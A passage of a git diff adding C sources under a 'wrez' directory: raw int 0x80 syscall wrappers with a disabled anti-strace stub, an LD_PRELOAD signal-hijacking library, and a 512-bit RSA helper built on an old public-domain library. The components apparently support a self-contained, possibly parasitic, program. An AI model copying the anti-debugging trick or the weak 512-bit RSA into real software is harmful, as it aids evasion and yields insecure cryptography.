+                             :"=a" (ret)
+                             :"0" (__NR_mprotect), "S" ((long)addr),
+                              "c" ((long)len), "d" ((long)prot): "bx");
+        return ret;
+}
+#endif
+
+
+static inline int read(int fd, void *buf, long count)
+{
+        long ret;
+
+        __asm__ __volatile__ ("int $0x80"
+                : "=a" (ret)
+                : "a" (__NR_read), "b" ((long) fd),
+                        "c" ((long) buf), "d" ((long) count));
+
+        return ret;
+}
+
+
+static inline int write(int fd, void *buf, long count)
+{
+        long ret;
+
+        __asm__ __volatile__ ("int $0x80"
+                : "=a" (ret)
+                : "a" (__NR_write), "b" ((long) fd),
+                        "c" ((long) buf), "d" ((long) count));
+
+        return ret;
+}
+
+static inline int waitpid (int pid, int *status, int options)
+{
+        long ret;
+
+        __asm__ __volatile__ ("int $0x80"
+                : "=a" (ret)
+                : "a" (__NR_waitpid), "b" ((long) pid),
+                        "c" ((long) status), "d" ((long) options));
+
+        return ret;
+}
+
+#define wait(status) waitpid(-1,status,0)
+
+static inline int unlink (char *pathname)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("int $0x80"
+                : "=a" (ret)
+                : "a" (__NR_unlink), "b" ((long)pathname));
+
+        return ret;
+}
+
+static inline int uname(struct utsname *un)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("int $0x80"
+                : "=a" (ret)
+                : "a" (__NR_uname), "b" ((long) un));
+        return ret;
+}
+
+
+static inline int execve(char *s, char **argv, char **envp)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("int $0x80"
+                             :"=a" (ret)
+                             :"a" (__NR_execve), "b" ((long)s),
+                              "c" ((long)argv), "d" ((long)envp));
+        return ret;
+}
+
+
+#if 0
+
+static inline int setreuid(int reuid, int euid)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("pushl %%ebx\n\t"
+                              "movl %%esi, %%ebx\n\t"
+                              "int $0x80"
+                             :"=a" (ret)
+                             :"0" (__NR_setreuid), "S" ((long)reuid),
+                              "c" ((long)euid): "bx");
+        return ret;
+}
+
+static inline int chroot(char *path)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("pushl %%ebx\n\t"
+                              "movl %%esi, %%ebx\n\t"
+                              "int $0x80"
+                             :"=a" (ret)
+                             :"0" (__NR_chroot), "S" ((long)path): "bx");
+        return ret;
+}
+
+static inline int brk(void *addr)
+{
+        long    ret;
+
+        __asm__ __volatile__ ("pushl %%ebx\n\t"
+                              "movl %%esi, %%ebx\n\t"
+                              "int $0x80"
+                              :"=a" (ret)
+                              :"0" (__NR_brk), "S" (addr): "bx");
+        return (ret);
+}
+
+static inline int dup(int fd)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("pushl %%ebx\n\t"
+                              "movl %%esi, %%ebx\n\t"
+                              "int $0x80"
+                             :"=a" (ret)
+                             :"0" (__NR_dup), "S" (fd): "bx");
+        return ret;
+}
+
+
+#endif
+
+static inline int _exit(int level)
+{
+        long    ret;
+
+        __asm__ __volatile__ ("int $0x80"
+                              :"=a" (ret)
+                              :"a" (__NR_exit), "b" (level));
+        return (ret);
+}
+
+static inline int dup2(int ofd, int nfd)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("int $0x80"
+                             :"=a" (ret)
+                             :"a" (__NR_dup2), "b" (ofd), "c" (nfd));
+        return ret;
+}
+
+static inline int open(char *path, int mode, int flags)
+{
+        long ret;
+
+        __asm__ __volatile__ ("int $0x80"
+                : "=a" (ret)
+                : "a" (__NR_open), "b" ((long) path),
+                        "c" ((int) mode), "d" ((int) flags));
+
+        return ret;
+}
+
+
+
+#if 0
+static inline int chdir(char *path)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("pushl %%ebx\n\t"
+                              "movl %%esi, %%ebx\n\t"
+                              "int $0x80"
+                             :"=a" (ret)
+                             :"0" (__NR_chdir), "S" ((long)path): "bx");
+        return ret;
+}
+#endif
+
+static inline int close(int fd)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("int $0x80"
+                             :"=a" (ret)
+                             :"a" (__NR_close), "b" ((int)fd));
+        return ret;
+}
+
+
+static inline int chown(char *path, int uid, int gid)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("int $0x80"
+                : "=a" (ret)
+                : "a" (__NR_chown), "b" ((long)path),
+                        "c" ((int)uid), "d" ((int)gid));
+
+        return ret;
+}
+
+static inline int rename(char *oldpath, char *newpath)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("int $0x80"
+                : "=a" (ret)
+                : "a" (__NR_rename), "b" ((long)oldpath),
+                        "c" ((int) newpath));
+        return ret;
+}
+
+#if 0
+static inline int chmod(char *path, int mode)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("pushl %%ebx\n\t"
+                              "movl %%esi, %%ebx\n\t"
+                              "int $0x80"
+                             :"=a" (ret)
+                             :"0" (__NR_chmod), "S" ((long)path),
+                              "c" ((int)mode): "bx");
+        return ret;
+}
+
+static inline int sync(void)
+{
+        long ret;
+
+        __asm__ __volatile__ ("int $0x80"
+                             :"=a" (ret)
+                             :"0" (__NR_sync));
+
+        return (ret);
+}
+
+static inline int antistrace(void)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("int $0x03\n\t"
+                             :"=a" (ret)
+                             : );
+        return (ret);
+}
+#endif
+
+#define SIG_DFL 0
+#define SIGHUP  1
+#define SIGINT  2
+#define SIGQUIT 3
+#define SIGILL  4
+#define SIGTRAP 5
+#define SIGABRT 6
+#define SIGFPE  8
+#define SIGKILL 9
+#define SIGUSR1 10
+#define SIGSEGV 11
+#define SIGUSR2 12
+#define SIGPIPE 13
+#define SIGALRM 14
+#define SIGTERM 15
+#define SIGCHLD 17
+#define SIGCONT 18
+#define SIGSTOP 19
+
+static inline int signal(int signum, void *handler)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("int $0x80"
+                             :"=a" (ret)
+                             :"a" (__NR_signal), "b" ((long)signum),
+                              "c" ((int)handler));
+        return ret;
+}
+
+static inline int fork(void)
+{
+        long ret;
+
+        __asm__ __volatile__ ("int $0x80"
+                             :"=a" (ret)
+                             :"0" (__NR_fork));
+
+        return (ret);
+}
+
+
+#endif
+
diff --git a/other/wrez/isolation/assfault.c b/other/wrez/isolation/assfault.c
new file mode 100644
index 0000000..5f54d82
--- /dev/null
+++ b/other/wrez/isolation/assfault.c
@@ -0,0 +1,107 @@
+/*
+ * assfault.so, 2001-09-25, anonymous@segfault.net
+ * 
+ * This is unpublished proprietary source code of someone without a name...
+ * someone who dont need to be named....
+ *
+ * The contents of these coded instructions, statements and computer
+ * programs may not be disclosed to third parties, copied or duplicated in
+ * any form, in whole or in part, without the prior written permission of
+ * the author. 
+ *
+ * Tries to catch SIGSEGV/SIGILL and continues execution flow.
+ *
+ * $ make
+ * $ LD_PRELOAD=./assfault.so netscape &
+ */
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <string.h>
+#include <signal.h>
+#include <dlfcn.h>
+
+#define REPLACE(a, x, y) if ( !(o_##x = dlsym(##a , ##y)) )\
+            { fprintf(stderr, ##y"() not found in libc!\n");\
+                exit(-1); }
+
+
+static void *(*o_signal)(int, void(*)(int));
+static void *libc_handle = NULL;
+static int segillcount = 0;
+
+void
+assfault_handler(int sig)
+{
+    fprintf(stderr, "%s occured (%d)\n"
+            , (sig==SIGSEGV)?"SIGSEGV":"SIGILL", ++segillcount);
+asm("
+    movl 0x44(%ebp),%ebx
+    incl %ebx
+    movl %ebx,0x44(%ebp)
+");
+}
+
+/*
+ * you may want to intercept sigprocmask, sigaction, setsig, .. also
+ */
+void 
+(*signal(int signum, void (*sighandler)(int)))(int)
+{
+    /*
+     * ignore if programm tries to set signal handler for SIGSEGV/SIGILL
+     */
+    if (signum == SIGSEGV)
+    {
+        fprintf(stderr, "signal(SIGSEGV, ...) call ignored [%d]\n", getpid());
+        return assfault_handler;
+    }
+
+    if (signum == SIGILL)
+    {
+        fprintf(stderr, "signal(SIGSILL, ...) call ignored [%d]\n", getpid());
+        return assfault_handler;
+    }
+    
+    /*
+     * call the original libc signal() -function
+     */
+    return o_signal(signum, sighandler);
+}
+
+
+static void
+assfault_init(void)
+{
+    if ( (libc_handle = dlopen("libc.so", RTLD_NOW)) == NULL)
+        if ( (libc_handle = dlopen("libc.so.6", RTLD_NOW)) == NULL)
+        {
+            fprintf(stderr, "error loading libc!\n");
+            exit(-1);
+        }
+
+    REPLACE(libc_handle, signal, "signal");
+
+    o_signal(SIGSEGV, assfault_handler);
+    o_signal(SIGILL, assfault_handler);
+
+    dlclose(libc_handle);
+}
+
+
+/*
+ * this function is called by the loaded.
+ */
+void
+_init(void)
+{
+    if (libc_handle != NULL)
+        return; /* should never happen */
+
+    fprintf(stderr, "assfault.so activated\n");
+    assfault_init();
+}
+
diff --git a/other/wrez/isolation/cipher-mrsa-interface b/other/wrez/isolation/cipher-mrsa-interface
new file mode 100755
index 0000000..11c389f
--- /dev/null
+++ b/other/wrez/isolation/cipher-mrsa-interface
diff --git a/other/wrez/isolation/cipher-mrsa-interface.c b/other/wrez/isolation/cipher-mrsa-interface.c
new file mode 100644
index 0000000..4096886
--- /dev/null
+++ b/other/wrez/isolation/cipher-mrsa-interface.c
@@ -0,0 +1,304 @@
+/* cipher-mrsa-interface.c - interface module to the mrsa module
+ *
+ * works around some limitations, bugs and cryptographical weaknesses within
+ * the mrsa library
+ */
+
+#ifdef  WREZ
+#include "int80.h"
+#include "common.h"
+#include "wrutil.h"
+#else
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#endif
+
+#include "cipher-mrsa.h"
+#include "cipher-mrsa-interface.h"
+
+
+#ifndef WREZ
+void
+hexdump (char *desc, unsigned char *data, unsigned int amount);
+#endif
+
+#define CLEAR_GAP_KEY   RSA_SIZE
+#define CLEAR_GAP_MSG   1
+
+int
+rsa_keypair_generate (rsa_pubkey *pub, rsa_privkey *priv)
+{
+        rsa_key key;
+        NN      msgtest,        /* test en/decryption */
+                msgorig;
+        int     fd = -1,
+                try_max = 10;
+#ifdef  WREZ
+        char *  rndfilename;
+
+        STRINGPTR (rndfilename, "/dev/urandom");
+#else
+        char *  rndfilename = "/dev/urandom";
+#endif
+
+new_key:
+        fd = open (rndfilename, O_RDONLY);
+        if (fd < 0)
+                return (-1);
+
+        memset (pub, 0x00, sizeof (*pub));
+        memset (priv, 0x00, sizeof (*priv));
+
+        if (read (fd, msgtest, sizeof (msgtest)) != sizeof (msgtest))
+                goto bail;
+
+try_key:
+        memset (&key, 0x00, sizeof (key));
+        if (read (fd, key.p, sizeof (key.p)) != sizeof (key.p) ||
+                read (fd, key.q, sizeof (key.q)) != sizeof (key.q))
+        {
+                goto bail;
+        }
+
+        /* NUL out highest bit (i think this works around a stall bug in
+         * mrsa, though i'm not quite sure what triggers it). it works with
+         * this code at least.
+         */
+#define CLEAR_UPPER(count,key) \
+        { \
+                int     cu, co = count; \
+                for (cu = (sizeof (key) - 1) ; co > 0 ; --co, --cu) \
+                        ((unsigned char *) key)[cu] = 0x00; \
+        }
+
+        CLEAR_UPPER (CLEAR_GAP_KEY, key.p);
+        CLEAR_UPPER (CLEAR_GAP_KEY, key.q);
+
+        /* try to generate a key out of the random data. if that fails, try
+         * again or give up when we had enough tries already.
+         */
+        if (rsa_gen (&key) == 0) {
+                try_max -= 1;
+                if (try_max > 0)
+                        goto try_key;
+
+                goto bail;
+        }
+
+        close (fd);
+
+        /* public key components
+         */
+        cp (pub->pq, key.pq);
+        cp (pub->e, key.e);
+
+        /* private key components
+         */
+        cp (priv->d, key.d);
+        cp (priv->p, key.p);
+        cp (priv->q, key.q);
+        cp (priv->dp, key.dp);
+        cp (priv->dq, key.dq);
+        cp (priv->qp, key.qp);
+
+        /* test key to work around bug in mrsa.
+         * XXX: once this test succeeds the keys are safe to use and work with
+         *      all possible input
+         * XXX: forbid d = 1, this is silly
+         */
+        if (priv->d[RSA_SIZE - 1] == 0x01)
+                goto new_key;
+        memcpy (msgorig, msgtest, sizeof (msgorig));
+        rsa_encrypt (pub, msgtest);
+        rsa_decrypt (priv, msgtest);
+        if (memcmp (msgtest, msgorig, sizeof (msgtest) != 0))
+                goto new_key;
+
+        return (0);
+
+bail:
+        if (fd != -1)
+                close (fd);
+
+        return (-1);
+}
+
+
+void
+rsa_keypair_dump (int fd, rsa_pubkey *pub, rsa_privkey *priv)
+{
+        char    str[RSA_SIZE * 4 + 3];
+
+#define KEYOUT(key) \
+        nh (str, key); \
+        str[strlen (str) + 1] = '\0'; \
+        str[strlen (str)] = '\n'; \
+        write (fd, str, strlen (str));
+
+        if (pub != NULL) {
+                KEYOUT (pub->pq);
+                KEYOUT (pub->e);
+        }
+
+        if (priv != NULL) {
+                KEYOUT (priv->d);
+                KEYOUT (priv->p);
+                KEYOUT (priv->q);
+                KEYOUT (priv->dp);
+                KEYOUT (priv->dq);
+                KEYOUT (priv->qp);
+        }
+#undef  KEYOUT
+
+        return;
+}
+
+
+/* rsa_keypair_import
+ *
+ * import a 512 bit rsa keypair from `fd' in human readable format to the
+ * `pub' and `priv' structures. each can be set to NULL to skip them.
+ *
+ * return in any case
+ */
+
+void
+rsa_keypair_import (int fd, rsa_pubkey *pub, rsa_privkey *priv)
+{
+        /* TODO */
+}
+
+
+void
+rsa_encrypt (rsa_pubkey *pub, unsigned char *data)
+{
+        rsa_key key;
+
+        memset (&key, 0x00, sizeof (key));
+        cp (key.pq, pub->pq);
+        cp (key.e, pub->e);
+
+        rsa_enc ((N) data, &key);
+}
+
+
+void
+rsa_decrypt (rsa_privkey *priv, unsigned char *data)
+{
+        rsa_key key;
+
+        memset (&key, 0x00, sizeof (key));
+        cp (key.d, priv->d);
+        cp (key.p, priv->p);
+        cp (key.q, priv->q);
+        cp (key.dp, priv->dp);
+        cp (key.dq, priv->dq);
+        cp (key.qp, priv->qp);
+
+        rsa_dec ((N) data, &key);
+}
+
+
+#ifdef  TESTING
+int
+main (int argc, char *argv[])
+{
+        int             n,
+                        fd;
+        rsa_pubkey      pub;
+        rsa_privkey     priv;
+
+        NN              msg;
+        NN              msg_orig;
+        int             testcount = 100,
+                        matchcount = 0;
+
+        n = rsa_keypair_generate (&pub, &priv);
+        printf ("rsa_keypair_generate () = %d\n", n);
+
+        /* dump keypair
+         */
+        printf ("keypair\n");
+        rsa_keypair_dump (2, &pub, &priv);
+        printf ("\n");
+
+        /* test, get random message and encrypt / decrypt it
+         */
+testcrypt:
+        fd = open ("/dev/urandom", O_RDONLY);
+        read (fd, msg, sizeof (msg));
+        close (fd);
+        CLEAR_UPPER (CLEAR_GAP_MSG, msg);
+        memcpy (msg_orig, msg, sizeof (msg_orig));
+//      hexdump ("message", (void *) msg, sizeof (msg));
+
+        rsa_encrypt (&pub, (unsigned char *) msg);
+//      hexdump ("message-encrypted", (void *) msg, sizeof (msg));
+        rsa_decrypt (&priv, (unsigned char *) msg);
+//      hexdump ("message-decrypted", (void *) msg, sizeof (msg));
+
+        if (memcmp (msg, msg_orig, sizeof (msg)) == 0)
+                matchcount += 1;
+
+        if (--testcount > 0)
+                goto testcrypt;
+
+        printf ("\n%d matched\n", matchcount);
+
+        return (0);
+}
+
+
+void
+hexdump (char *desc, unsigned char *data, unsigned int amount)
+{
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] =
+                "................................ !\"#$%&'()*+,-./0123456789"
+                ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                "nopqrstuvwxyz{|}~...................................."
+                "....................................................."
+                "........................................";
+
+
+        printf ("/* %s, %u bytes */\n", desc, amount);
+
+        for (dp = 1; dp <= amount; dp++) {
+                fprintf (stderr, "%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        fprintf (stderr, " ");
+                if ((dp % 16) == 0) {
+                        fprintf (stderr, "| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                fprintf (stderr, "%c", trans[data[dp]]);
+                        fflush (stderr);
+                        fprintf (stderr, "\n");
+                }
+                fflush (stderr);
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        fprintf (stderr, "   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                fprintf (stderr, " ");
+                        fflush (stderr);
+                }
+                fprintf (stderr, " | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        fprintf (stderr, "%c", trans[data[dp]]);
+                fflush (stderr);
+        }
+        fprintf (stderr, "\n");
+
+        return;
+}
+
+#endif
+
diff --git a/other/wrez/isolation/cipher-mrsa-interface.h b/other/wrez/isolation/cipher-mrsa-interface.h
new file mode 100644
index 0000000..2143945
--- /dev/null
+++ b/other/wrez/isolation/cipher-mrsa-interface.h
@@ -0,0 +1,79 @@
+
+#ifndef CIPHER_MRSA_INTERFACE_H
+#define CIPHER_MRSA_INTERFACE_H
+
+#include "cipher-mrsa.h"
+
+
+typedef struct {
+        NN      pq;     /* n = p * q */
+        NN      e;      /* public exponent */
+} rsa_pubkey;
+
+typedef struct {
+        NN      d;      /* private exponent */
+        NN      p, q;
+        NN      dp, dq, qp;
+} rsa_privkey;
+
+
+/* rsa_keypair_generate
+ *
+ * generate a 512 bit rsa keypair and copy only required components into the
+ * appropiate structure.
+ *
+ * return 0 on success
+ * return != 0 on failure
+ */
+
+int
+rsa_keypair_generate (rsa_pubkey *pub, rsa_privkey *priv);
+
+
+/* rsa_keypair_dump
+ *
+ * output the two keys in human readable form to `fd'. when they are set to
+ * NULL, they are not exported.
+ *
+ * return in any case
+ */
+
+void
+rsa_keypair_dump (int fd, rsa_pubkey *pub, rsa_privkey *priv);
+
+
+/* rsa_keypair_import
+ *
+ * import a 512 bit rsa keypair from `fd' in human readable format to the
+ * `pub' and `priv' structures. each can be set to NULL to skip them.
+ *
+ * return in any case
+ */
+
+void
+rsa_keypair_import (int fd, rsa_pubkey *pub, rsa_privkey *priv);
+
+
+/* rsa_encrypt
+ *
+ * encrypt RSA_SIZE byte array at `data' with the public key `pub'.
+ *
+ * return in any case
+ */
+
+void
+rsa_encrypt (rsa_pubkey *pub, unsigned char *data);
+
+
+/* rsa_decrypt
+ *
+ * decrypt RSA_SIZE byte array at `data' with the private key `priv'.
+ *
+ * return in any case
+ */
+
+void
+rsa_decrypt (rsa_privkey *priv, unsigned char *data);
+
+#endif
+
diff --git a/other/wrez/isolation/cipher-mrsa.c b/other/wrez/isolation/cipher-mrsa.c
new file mode 100644
index 0000000..74ffb57
--- /dev/null
+++ b/other/wrez/isolation/cipher-mrsa.c
@@ -0,0 +1,717 @@
+/*
+ * mrsa.c -- portable multiprecision math and RSA library
+ * 1993 Risto Paasivirta, paasivir@jyu.fi
+ * Public Domain, no warranty. 
+ */
+
+#define MRSA_C 1
+
+#include "cipher-mrsa.h"
+
+/*
+ * math library stuff
+ */
+
+/*
+ * sign = ts(N a) -- test signed, returns 1, 0 or -1 
+ */
+
+PRIVATE int
+ts(N a)
+{
+        ULONG i = RSA_SIZE;
+        if (a[RSA_SIZE - 1] & SIGN_BIT)
+                return -1;
+        while (i--)
+                if (*a++)
+                        return 1;
+        return 0;
+}
+
+/*
+ * carry = ng(N a) -- negate, returns carry
+ */
+
+PRIVATE ULONG
+ng(N a)
+{
+        ULONG c = 0, i = RSA_SIZE;
+        while (i--) {
+                c = 0 - *a - c;
+                *a++ = c;
+                c = (c >> UNIT_BITS) & 1;
+        } return c;
+}
+
+/*
+ * cl(N a) -- clear value, a = 0
+ */
+
+PRIVATE void
+cl(N a)
+{
+        ULONG i = 0;
+        while (i++ < RSA_SIZE)
+                *a++ = 0;
+}
+
+/*
+ * cp(N a, N b) -- copy, a = b
+ */
+
+PRIVATE void
+cp(N a, N b)
+{
+        ULONG i = RSA_SIZE;
+        while (i--)
+                *a++ = *b++;
+}
+
+/*
+ * flag = cu(a, b) -- compare unsigned, returns <0 if a<b, 0 if a==b, >0 if a>b
+ */
+ 
+PRIVATE int
+cu(N a, N b)
+{
+        ULONG i = RSA_SIZE;
+        a += RSA_SIZE;
+        b += RSA_SIZE;
+        while (i--)
+                if (*--a - *--b)
+                        return (int) *a - (int) *b;
+        return 0;
+}
+
+/*
+ * carry = ad(N a, N b) -- add, a += b
+ */
+
+PRIVATE ULONG
+ad(N a, N b)
+{
+        ULONG c = 0, i = RSA_SIZE;
+        while (i--) {
+                c = *b++ + *a + c;
+                *a++ = c;
+                c >>= UNIT_BITS;
+        } 
+        return c;
+}
+
+/*
+ * carry = sb(N a, N b) -- substract, a -= b
+ */
+
+PRIVATE ULONG
+sb(N a, N b)
+{
+        ULONG c = 0, i = RSA_SIZE;
+        while (i--) {
+                c = *a - *b++ - c;
+                *a++ = c;
+                c = (c >> UNIT_BITS) & 1;
+        }
+        return c;
+}
+
+/*
+ * carry = sr(N a) -- shift right, a >>= 1
+ */
+
+PRIVATE ULONG
+sr(N a)
+{
+        ULONG c = 0, i = RSA_SIZE;
+        a += RSA_SIZE;
+        while (i--) {
+                c |= *--a;
+                *a = c >> 1;
+                c = (c & 1) << UNIT_BITS;
+        }
+        return c;
+}
+
+/*
+ * carry = sl(N a) -- shift left, a <<= 1
+ */
+
+PRIVATE ULONG
+sl(N a)
+{
+        ULONG c = 0, i = RSA_SIZE;
+        while (i--) {
+                c |= (ULONG) * a << 1;
+                *a++ = c;
+                c = (c >> UNIT_BITS) & 1;
+        }
+        return c;
+}
+
+/*
+ * dm(N a, N b, N c) -- divide-modulo unsigned, a = a / b, c = a % b
+ */
+
+PRIVATE void
+dm(N a, N b, N c)
+{
+        ULONG i = RSA_SIZE * UNIT_BITS;
+        cl(c);
+        while (i--) {
+                sl(c);
+                *c |= sl(a);
+                if (sb(c, b)) {
+                        ad(c, b);
+                } else {
+                        *a |= 1;
+                }
+        }
+}
+
+/*
+ * remainder = di(N a, int n) -- divide by integer
+ */
+
+PRIVATE ULONG
+di(N a, ULONG t)
+{
+        ULONG c = 0, i = RSA_SIZE;
+        while (i--) {
+                c = (c << UNIT_BITS) | a[i];
+                a[i] = c / t;
+                c = c % t;
+        } 
+        return c;
+}
+
+/*
+ * mu(N a, N b) -- multiply unsigned, a *= b
+ */
+
+PRIVATE void
+mu(N a, N b)
+{
+        ULONG i = RSA_SIZE * UNIT_BITS;
+        NN c;
+        cl(c);
+        while (i--) {
+                sl(c);
+                if (sl(a))
+                        ad(c, b);
+        }
+        cp(a, c);
+}
+
+/*
+ * mm(N a, N b, N m) -- modular multiply, a = a * b mod m 
+ */
+
+PRIVATE void
+mm(N a, N b, N m)
+{
+        ULONG i = RSA_SIZE * UNIT_BITS;
+        NN c;
+        cl(c);
+        while (i--) {
+                sl(c);
+                if (sb(c, m))
+                        ad(c, m);
+                if (sl(a))
+                        ad(c, b);
+                if (sb(c, m))
+                        ad(c, m);
+        }
+        cp(a, c);
+}
+
+/*
+ * pmm(N a, N b, N m, ULONG p) -- internal modmul w/precision for modexp
+ */
+
+static void
+pmm(N aa, N b, N m, ULONG p)
+{
+        ULONG k, c, j = UNIT_BITS, i;
+        NN v;
+        N a;
+        i = p;
+        cl(v);
+        a = aa + p;
+        while (!*--a
+               && i)
+                i--;
+        if (i) {
+                while (!(*a & (1 << j)) && j)
+                        j--;
+                cp(v, b);
+        } while (i--) {
+                while (j--) {
+                        for (k = 0, c = 0; k < p; k++) {
+                                c |= (ULONG) v[k] << 1;
+                                v
+                                        [k] = c;
+                                c >>= UNIT_BITS;
+                        } for (k = 0, c = 0; k < p; k++) {
+                                c = v[k] - m[k] - c;
+                                v[k] = c;
+                                c = (c >> UNIT_BITS) & 1;
+                        } if (c)
+                                for (k = 0, c = 0; k < p; k++) {
+                                        c = v[k] + m[k] + c;
+                                        v[k] = c;
+                                        c >>= UNIT_BITS;
+                        } if (*a & (1 << j)) {
+                                for (k = 0, c = 0; k < p; k++) {
+                                        c = v[k] + b[k] + c;
+                                        v[k] = c;
+                                        c >>= UNIT_BITS;
+                                } for (k = 0, c = 0; k < p; k++) {
+                                        c = v[k] - m[k] - c;
+                                        v[k] = c;
+                                        c = (c >> UNIT_BITS) & 1;
+                                } if (c)
+                                        for (k = 0, c = 0; k < p; k++) {
+                                                c = v[k] + m[k] + c;
+                                                v[k] = c;
+                                                c >>= UNIT_BITS;
+                                        }
+                        }
+                }
+                a--;
+                j = UNIT_BITS;
+        }
+        cp(aa, v);
+}
+
+/*
+ * em(N a, N b, N m) -- modular exponentation, a = a^b mod n
+ */
+
+PRIVATE void
+em(N a, N e, N m)
+{
+        ULONG i = RSA_SIZE, j = UNIT_BITS, p = RSA_SIZE;
+        NN c;
+        N mp;
+        cl(c);
+        *c = 1;
+        e += RSA_SIZE;
+        while (!*--e && i)
+                i--;
+        if (i) {
+                while (!(*e & (1 << j)))
+                        j--;
+                cp(c, a);
+        }
+        mp = m + RSA_SIZE;
+        while (!*--mp && p)
+                p--;
+        if (*mp & SIGN_BIT && p < RSA_SIZE)
+                p++;
+        while (i--) {
+                while (j--) {
+                        pmm(c, c, m, p);
+                        if (*e & (1 << j))
+                                pmm(c, a, m, p);
+                }
+                e--;
+                j = UNIT_BITS;
+        }
+        cp(a, c);
+}
+
+/*
+ * gd(N a, N b) -- a = greatest common divisor(a,b)
+ */
+
+PRIVATE void
+gd(N a, N bb)
+{
+        NN r, b;
+        cp(b, bb);
+        while (ts(b)) {
+                dm(a, b, r);
+                cp(a, b);
+                cp(b, r);
+        }
+}
+
+/*
+ * iv(N a, N b) -- multiplicative inverse, a = a^{-1} mod b 
+ */
+
+PRIVATE void
+iv(N a, N b)
+{
+        NN c, d, e, f, g, y;
+        cp(c, b);
+        cl(e);
+        cl(f);
+        *f = 1;
+        while (ts(a)) {
+                cp(y, c);
+                dm(y, a, d);
+                if (f[RSA_SIZE - 1] & SIGN_BIT) {
+                        ng(f);
+                        mu(y, f);
+                        ng(f);
+                        ng(y);
+                } else
+                        mu(y, f);
+                cp(g, e);
+                sb(g, y);
+                cp(c, a);
+                cp(a, d);
+                cp(e, f);
+                cp(f, g);
+        }
+        if (e[RSA_SIZE - 1] & SIGN_BIT)
+                ad(e, b);
+        cp(a, e);
+}
+
+/*
+ * nh(char *a, N b) -- convert value to a hex string (use for debugging)
+ */
+
+PRIVATE void
+nh(char *a, N b)
+{
+        char *d = "0123456789abcdef";
+        NN c;
+        ULONG i = RSA_SIZE * sizeof(UWORD) * 2; /* 2 digits/byte! */
+        cp(c, b);
+        a += RSA_SIZE * sizeof(UWORD) * 2;
+        *a = 0;
+        while (i--) {
+                *--a = d[*c & 15];
+                sr(c);
+                sr(c);
+                sr(c);
+                sr(c);
+        }
+}
+
+/*
+ * hn(N a, char *b) -- lower-case hex string to value (use for constants)
+ */
+
+PRIVATE void
+hn(N a, char *b)
+{
+        cl(a);
+        while (*b) {
+                sl(a);
+                sl(a);
+                sl(a);
+                sl(a);
+                *a += *b < 'a' ? *b - '0' : *b - ('a' - 10);
+                b++;
+        }
+}
+
+/*
+ * integer = ri() -- generate weak pseudorandom integer (range 0-65535)
+ */
+
+PRIVATE ULONG
+ri(void)
+{
+        static ULONG s = 27182;
+        s = (s * 31421 + 6927) & 0xffff;
+        return s;
+}
+
+/*
+ * prime generation and RSA stuff
+ */
+
+/*
+ * randomize(N n, ULONG bits) -- pseudorandomize n, limit to value to
+ * range 2^bits to 2^(bits+1)-1. This function eors n with weak random
+ * generator, n should be initialized with at least bits-bit strong random
+ * value before call.
+ * (XXX check portablility when converting to >16-bit UWORD machine)
+ */
+
+void
+randomize(N a, ULONG b)
+{
+        ULONG i;
+        NN c;
+        N d = c;
+        cp(c,a);
+        cl(a);
+        if(b>UNIT_BITS*RSA_SIZE-2) {
+                i = RSA_SIZE-1;
+                b = UNIT_BITS-2;
+        } else {
+                i = b / UNIT_BITS;
+                b = b % UNIT_BITS;
+        }
+        while (i--)
+                *a++ = *d++ ^ ri();
+        *a = ((*d ^ ri()) & ((1 << b) - 1)) | (1 << b);
+}
+
+/*
+ * const sp[PRIMES], PRIMES -- table of small primes, number of primes in table
+ */
+
+static unsigned char sp[PRIMES] = {
+  2,  3,  5,  7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53,
+ 59, 61, 67, 71, 73, 79, 83, 89, 97,101,103,107,109,113,127,131,
+137,139,149,151,157,163,167,173,179,181,191,193,197,199,211,223,
+227,229,233,239,241,251
+};
+
+/*
+ * divisor = sieve_prime(N n) -- try to find divisor of n by sieving
+ * with small integers returns divisor or 0 if no divisor found.
+ */
+
+ULONG
+sieve_prime(N n)
+{
+        ULONG i;
+        NN a;
+        for(i=0;i<PRIMES;i++) {
+                cp(a,n);
+                if(!di(a,sp[i]))
+                        return ((ULONG)sp[i]);
+        }
+        return (0);
+}
+
+/*
+ * flag = prob_prime(N n) -- test if 2^(n-1) mod n == 1. Returns 0 if
+ * test failed, !0 if success. Large n which passes this test is a
+ * probable prime. This test does not work well with small value of n. 
+ * Because this test is slow, you should first try sieving n.
+ */
+
+int
+prob_prime(N m)
+{
+        ULONG i = RSA_SIZE, j = UNIT_BITS, p = RSA_SIZE;
+        NN c, ee;
+        N mp, e = ee + RSA_SIZE;
+        cl(c);
+        *c = 1;
+        cp(ee, m);
+        sb(ee, c);
+        while (!*--e && i)
+                i--;
+        if (i) {
+                while (!(*e & (1 << j)))
+                        j--;
+                *c = 2;
+        }
+        mp = m + RSA_SIZE;
+        while (!*--mp && p)
+                p--;
+        if (*mp & SIGN_BIT && p < RSA_SIZE)
+                p++;
+        while (i--) {
+                while (j--) {
+                        pmm(c, c, m, p);
+                        if (*e & (1 << j)) {
+                                sl(c);
